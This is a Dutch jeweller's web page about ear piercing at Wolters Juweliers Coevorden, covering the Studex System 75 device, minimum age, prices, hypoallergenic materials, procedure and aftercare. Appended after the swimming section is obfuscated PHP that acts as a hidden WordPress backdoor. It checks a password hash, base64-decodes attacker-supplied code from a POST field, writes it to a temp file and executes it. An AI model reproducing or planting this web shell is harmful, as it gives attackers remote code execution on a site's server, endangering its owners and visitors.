oorgaatjes-schieten zetten-hygiënisch-en-deskundig-bij-Wolters-Juweliers-Coeovorden

Oorgaatjes schieten/zetten bij Wolters Juweliers Coevorden

Op deze pagina lees je alles over oorbellen schieten/zetten bij Wolters Juweliers Coevorden.

Bij Wolters Juweliers Coevorden beschikken wij over de juiste apparatuur
( Studex System 75) en certificaten om gaatjes in het oor te schieten. De speciale schietoorknopjes zijn gemaakt van chirurgisch staal, zodat de kans op ontstekingen gering is.

Vanaf welke leeftijd oorgaatjes laten schieten

Bij Wolters Juweliers schieten wij oorgaatjes vanaf de leeftijd van 4 jaar. Omdat wij het belangrijk vinden dat een kind er zelf voor kiest. En op deze leeftijd kan je goed uitleggen dat als je kindje het echt wil het dan even pijn doet.

Wat kost het om oorbellen te schieten/prikken?

Vanaf 15 euro kun je bij Wolters Juweliers Coevorden oorbellen laten schieten. De prijs is afhankelijk van de oorbellen die je uitzoekt. Het schattige vlindertje met steentjes kosten bijvoorbeeld € 29,00

Materiaal

Oorknopjes van Titanium, Chirurgisch staal en echt goud. Deze materialen zorgen ervoor dat er geen allergische reacties optreden en er een snelle genezing is. Alle Studex oorstekers en oorbellen zijn hypoallergeen, nikkelafgifte-, lood-, cadmium- en kobalt-vrij.

oorgaatjes-schieten-bij-Wolters-Juweliers-Coeovorden-Emmen

Bekijk het filmpje over oorgaatjes schieten

Hoe werkt het gaatjes zetten?

Eerst worden de oren ontsmet. Vervolgens wordt er met een jodiumstift een stip gezet op de plek waar het gaatje moet komen. Zo kan worden bekeken of de stippen beide op dezelfde hoogte zitten en mooi in het midden. Daarna wordt de oorbel in het apparaat geplaatst.

De eerste oorbellen, waarmee de gaatjes gezet worden, zijn in steriele wegwerpverpakkingen verpakt. Het apparaat werkt snel en eenvoudig. Hierbij wordt gelijktijdig het gaatje gemaakt, de oorbel in het oorgaatje gezet en de sluiting (pousette) op de achterkant aangebracht. Er worden geen gaatjes geschoten maar gezet; de oorbel is zo scherp als een piercing-naald.

Doet het zetten van oorgaatjes pijn?

Het zetten van gaatjes een kwestie van seconden. Dankzij het gebruik van de de Sudex System 75 is het zetten van de eerste oorbellen nauwelijks voelbaar. Bovendien is gebruik van het apparaat vrijwel geruisloos, zodat de kinderen niet schrikken. Het enige wat je zult voelen is een klein prikje.

Verzorgingtips pas geprikte oorgaatjes

Een goede verzorging van pas gezette oorgaatjes is zeer belangrijk.

Je moet de oorlellen minstens 6 weken extra goed schoonhouden. En laat de eerste oorbellen minstens 6 weken in je oor, zonder ze eruit te halen. Na 6 weken kun je de oorbellen verwijderen en meteen door een oorbel van uw keuze vervangen. Voor het verzorgen van het wondje bieden wij een verzorgingsmiddel aan, dat bij ons te koop is.

Draag de eerste 5 maanden alleen oorstekers als sieraad. De stift van de oorsteker zou van nikkelafgiftevrij chirurgisch staal of een ander anti-allergisch materiaal moeten zijn. Alle Studex-oorbellen van de Sensitive lijn zijn optimaal als vervolg oorbel geschikt. Bij Wolters Juweliers vind je hoogwaardige oorstekers, bijv. van echt goud, die je perfect als vervolg oorbel kunt dragen.

Lees meer verzorgingstips voor jouw oorgaatjes in deze verzorgingshandleiding

oorgaatjes-schieten-bij-Wolters-Juweliers-Coeovorden-Emmen
oorgaatjes-voor-kinderen-eerste-oorbellen-bij-Wolters-Juweliers-Coevorden

Zwemmen met pas gezette oorbellen

Met pas geprikte oorbellen kun je gewoon zwemmen. Maak je oren na het zwemmen wel een extra keer schoon met een ontsmettingsmiddel. Mochten de oren wel rood worden na het zwemmen of je houdt er last van, dan kun je beter even wachten met zwemmen.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}